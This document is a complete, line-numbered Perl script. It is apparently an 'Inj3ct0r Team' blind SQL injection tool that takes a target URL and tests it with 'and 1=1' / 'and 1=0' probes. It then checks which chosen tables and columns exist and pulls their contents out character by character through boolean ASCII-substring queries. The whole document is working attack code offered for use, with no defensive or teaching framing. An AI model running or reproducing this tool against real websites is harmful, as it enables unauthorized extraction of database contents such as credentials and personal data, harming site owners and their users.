Blind SQL injection [perl] by Angel Injection

1. #!/usr/bin/perl
2. use LWP::Simple;
3. use Time::HiRes qw(gettimeofday);
4. ###############################################################
5.  
6. $string='';
7. $limit=0;
8.  
9. #string variable###############################################
10. # if the string that you want to use is not writable #
11. # on the shell you can write in this variable and #
12. # whene the script order from you the variable just #
13. # press enter. #
14. ###############################################################
15.  
16. #limit variable##############################################
17. # if you want a particular column just change this #
18. # variable. #
19. #############################################################
20.  
21.  
22. @ascii_sym = (32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,58,59,60,61,62,63,64,91,92,93,94,95,96,123,124,125,126);
23. $glob_stat;
24.  
25. print "\n\t===============================================*\n";
26. print "\t* Blind Sql Injection Tool *\n";
27. print "\t* Coded By Angel Injection *\n";
28. print "\t* Member From Inj3ct0r Team *\n";
29. print "\t* Thanks To:r0073r,Sid3^effects,r4dc0re,CrosS, *\n";
30. print "\t===============================================*\n\n";
31.  
32. print "Stage 1:Checking if the target is vulnerable\n\n";
33. print "You should now enter the infected url\n";
34. print "Example :http://www.localhost/index.php?id=1\n\n";
35. print "URL: ";
36. my $url = <STDIN>;
37. chomp($url);
38. $now = time_mili();
39. my $yes = get("$url+and+1=1");
40. $later = time_mili();
41. $exect = $later - $now;
42. $exect = sprintf("%.2f", $exect);
43. my $no = get("$url+and+1=0");
44. def($yes,$no);
45. print "Stage 2 :[*] Checking For A String That Can lead To exploit The Target[*]\n\n";
46. print " You should now enter a string(from shell or source code)\n";
47. print " and wait to see if is a good one. Your string must be \n";
48. print " related to the target\n\n";
49. print " The string must exist on the true page or the false page \n";
50. print " but not on both of them.\n";
51. print " A file has been created under the name string.txt it may help\n";
52. print " you to choose your string\n\n";
53.  
54. if($string eq ''){
55. print "String: ";
56. $string = <STDIN>;
57. chomp($string);
58. while(strc($yes,$no)!=1){
59. print "String: ";
60. $string = <STDIN>;
61. chomp($string);
62. }
63. }
64. else{
65. if(strc($yes,$no)!=1){
66. print "Please Choose another one\n: ";
67. exit;
68. }
69. }
70. chomp($string);
71. print "\n => Nice choice\n\n";
72.  
73. print "Stage 3 :[*] Extracting Information From Database[*]\n\n";
74. print " You should now enter The Table name\n";
75. print " and number of Columns to be extracted\n";
76. print " and their names and condition on this columns\n";
77. print " if you want it\n\n";
78.  
79. print "Table Name : ";
80. my $tbname = <STDIN>;
81. chomp($tbname);
82. print "Columns Number : ";
83. my $num = <STDIN>;
84. chomp($num);
85. if($num =~ /^[+-]?\d+$/){
86. chomp($num);
87. }
88. else{
89. while($num !~ /^[+-]?\d+$/){
90. print "Columns Number : ";
91. $num = <STDIN>;
92. chomp($num);
93. }
94. }
95. chomp($num);
96. my @column,@trcolmun,@numtr,@result;
97. for(my $q=0;$q<$num;$q++){
98. print "Columns Name : ";
99. $column[$q] = <STDIN>;
100. chomp($column[$q]);
101. }
102.  
103. print "\n Do You have any condition on your information\n";
104. print " Exemple: where id=1\n\n";
105. print "(yes/no): ";
106. my $condt = <STDIN>;
107. chomp($condt);
108. if($condt eq 'yes'){
109. print "\nEnter Condition: ";
110. $condition=<STDIN>;
111. chomp($condition);
112. }
113. print "\nStage 3-1 :[*] Checking table and columns[*]\n\n";
114. print " Nothing That You Can do it now\n";
115. print " just let the script do his job\n\n";
116. my $pr=chvar("$url+and+(SELECT 1 from $tbname limit 0,1)=1");
117. if($pr==1){
118. print " => Table Existe\n";
119. }
120. else{
121. print " => Table Dosn't Existe";
122. exit;
123. }
124. my $j=0;
125. for(my $q=0;$q<$num;$q++){
126. $pr = chvar("$url+and+(SELECT substring(concat(1,$column[$q]),1,1) from $tbname limit 0,1)=1");
127. if($pr==1){
128. $trcolumn[$j] = $column[$q];
129. print " => Column $column[$q] Existe\n";
130. $j++;
131. }
132. else{
133. print " => Column $column[$q] Dosn't Existe\n";
134. }
135. }
136. $trco = @trcolumn;
137. if($trco==0){
138. print "\n => No Columns Found\n";
139. exit;
140. }
141.  
142. print "\nStage 3-2 :[*] Extracting Columns length[*]\n\n";
143. print " The Script is going now to get each\n";
144. print " columns length\n";
145. print "\nCounting length of Columns...\n\n";
146. for(my $q=0;$q<$j;$q++){
147. my $qj=0;
148. my $ii=1;
149. while($qj==0){
150. $pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
151. if($pr==1){
152. $ii++;
153. $pr = chvar("$url+and+ascii(substring((select concat($trcolumn[$q],0x3a,0x3a)+from+$tbname $condition limit+$limit,1),$ii,1))=58");
154. if($pr==1){
155. $qj=1;
156. }
157. else{
158. $ii--
159. }
160. }
161. $ii++;
162. }
163. $ii -=3;
164. $numtr[$q]=$ii;
165. print " => $trcolumn[$q] : $ii\n";
166. }
167. for(my $rul=0;$rul<$trco;$rul++){
168. $result[$rul]='';
169. }
170. $gtf=0;
171. ($second, $minute, $hour) = localtime();
172. print "\nExtracting information ...\n\n";
173. print "Guessing time for each column(in seconds)\n\n";
174. for(my $idn=0;$idn<$trco;$idn++){
175. $max = $numtr[$idn] * $exect * 8;
176. $max=sprintf("%.2f", $max);
177. $gtf+=$max;
178. print " #=> $trcolumn[$idn] max time of extraction = $max\n";
179. }
180. print "\nStart at $hour:$minute:$second (expected time to finish (in seconds) : $gtf)\n\n";
181. $now1 = time_mili();
182. for(my $bn=0;$bn<$trco;$bn++){
183. $nowt = time_mili();
184. for(my $bnum=1;$bnum<=$numtr[$bn];$bnum++){
185. my $ascii=opt("$url+and+ascii(substring((select concat($trcolumn[$bn],0x3a)+from+$tbname $condition limit+$limit,1),$bnum,1))");
186. $result[$bn].=pack("c",$ascii);
187. }
188. $latert = time_mili();
189. $realt = $latert - $nowt;
190. $realt=sprintf("%.2f", $realt);
191. print " => $trcolumn[$bn] = [$result[$bn]] (real time = $realt)\n";
192. }
193. $later1 = time_mili();
194. $exect1 = $later1 - $now1;
195. $exect1 = sprintf("%.2f", $exect1);
196. ($second, $minute, $hour) = localtime() ;
197. print "\nFinish at $hour:$minute:$second (elapsed time (in seconds) : $exect1) \n\n";
198.  
199. sub opt{
200. my $url=$_[0];
201. my $isnum = $url;
202. my $sym_st;
203. $isnum .= ">57";
204. my $isalpha = $url;
205. $isalpha .= ">96";
206. my $isAlpha = $url;
207. $isAlpha .= ">65";
208. my $rt='';
209. my $brp = chvar($isnum);
210. if($brp==1){
211. my $brp1 = chvar($isalpha);
212. if($brp1==1){
213. $rt = brute_alpha($url,97,103,110,115,122);
214. $sym_st=3;
215. }
216. else{
217. $rt = brute_alpha($url,65,71,78,83,90);
218. $sym_st=2;
219. }
220. }
221. else{
222. $rt = brute_num($url);
223. $sym_st=1;
224. }
225.  
226. if(ord($rt) == 0){
227. $rt = opt_sym($url,$sym_st);
228. }
229. return $rt;
230. }
231.  
232. sub opt_sym(){
233. my $url = $_[0];
234. my $rt='';
235. if($_[1]==1){
236. my $ft = $url;
237. $ft .= ">40";
238. my $rft = chvar($ft);
239. if($rft==1){
240. $rt = brute_sym($url,8,15);
241. }
242. else{
243. $rt = brute_sym($url,0,7);
244. }
245. }
246. else{
247. if($_[1]==2){
248. $rt=brute_sym($url,16,22);
249. }
250. else{
251. $rt=brute_sym($url,23,32);
252. }
253. }
254. return $rt;
255. }
256.  
257. sub reduse{
258. for(my $i=$_[0];$i<=$_[1];$i++){
259. my $tmp = $_[2];
260. $tmp .="=$i";
261. my $qq = chvar($tmp);
262. if($qq==1){
263. return $i;
264. last;
265. }
266. }
267. }
268.  
269. sub brute_sym(){
270. my $ek;
271. for(my $i=$_[1];$i<=$_[2];$i++){
272. my $tmp = $_[0];
273. $tmp .="=$ascii_sym[$i]";
274. my $qq = chvar($tmp);
275. if($qq==1){
276. $ek=$i;
277. last;
278. }
279. }
280. return $ascii_sym[$ek];
281. }
282.  
283. sub brute_num(){
284. my $url = $_[0];
285. my $ft = $url;
286. my $rt='';
287. $ft .= ">52";
288. my $mrp = chvar($ft);
289. if($mrp==1){
290. $rt = reduse(53,57,$url);
291. }
292. else{
293. $rt = reduse(48,52,$url);
294. }
295. return $rt;
296. }
297.  
298. sub brute_alpha(){
299. my $url = $_[0];
300. my $ft = $url;
301. my $sd = $url;
302. my $td = $url;
303. my $rt ='';
304. $ft .= ">$_[2]";
305. $sd .= ">$_[3]";
306. $td .= ">$_[4]";
307. my $mrp = chvar($ft);
308. if($mrp==1){
309. my $mrp1 = chvar($sd);
310. if($mrp1==1){
311. my $mrp2=chvar($td);
312. if($mrp2==1){
313. $rt = reduse(($_[4]+1),$_[5],$url);
314. }
315. else{
316. $rt = reduse(($_[3]+1),$_[4],$url);
317. }
318. }
319. else{
320. $rt = reduse(($_[2]+1),$_[3],$url);
321. }
322. }
323. else{
324. $rt = reduse($_[1],$_[2],$url);
325. }
326. return $rt;
327. }
328.  
329.  
330. sub strc{
331. my $tmp=0;
332. if(($_[0] =~ /$string/) && ($_[1] !~ /$string/)){
333. $glob_stat=1;
334. return 1;
335. }
336. elsif(($_[1] =~ /$string/) && ($_[0] !~ /$string/)){
337. $glob_stat=0;
338. return 1;
339. }
340. elsif(($_[1] =~ /$string/) && ($_[0] =~ /$string/)){
341. return 0;
342. }
343. }
344.  
345. sub def{
346. my @fi = split(//,$_[0]);
347. my @sd = split(//,$_[1]);
348. my $rt='';
349. my $cn = @fi;
350. my $cn1 = @sd;
351. my $k;
352. ($cn>$cn1) ? $k=$cn : $k=$cn1;
353. my $i,$j=0;
354. for($i=0;$i<$k;$i++){
355. if($fi[$i] ne $sd[$i]){
356. $rt.=$fi[$i];
357. $j++;
358. }
359. }
360. if(($j>5) && ($j<($i-300))){
361. print "\n => Target Maybe Vulnerable\n\n";
362. open(MYFILE,'>string.txt');
363. print MYFILE $rt;
364. close(MYFILE);
365. }
366. else{
367. print "\n => Target Not Vulnerable\n\n";
368. exit;
369. }
370. }
371.  
372. sub chvar{
373. my $url=$_[0];
374. my $tmp = get($url);
375. if($tmp=~/$string/){
376. if($glob_stat==1){
377. return 1;
378. }
379. elsif($glob_stat==0){
380. return 0;
381. }
382. }
383. elsif($tmp!~/$string/){
384. if($glob_stat==1){
385. return 0;
386. }
387. elsif($glob_stat==0){
388. return 1;
389. }
390. }
391. }
392.  
393. sub time_mili(){
394. my $s,$m,$r;
395. ($s,$m) = gettimeofday();
396. $r = "$s.$m";
397. $r +=0;
398. my $rt = sprintf("%.3f", $r);
399. $rt +=0;
400. return $rt;
401. }
402.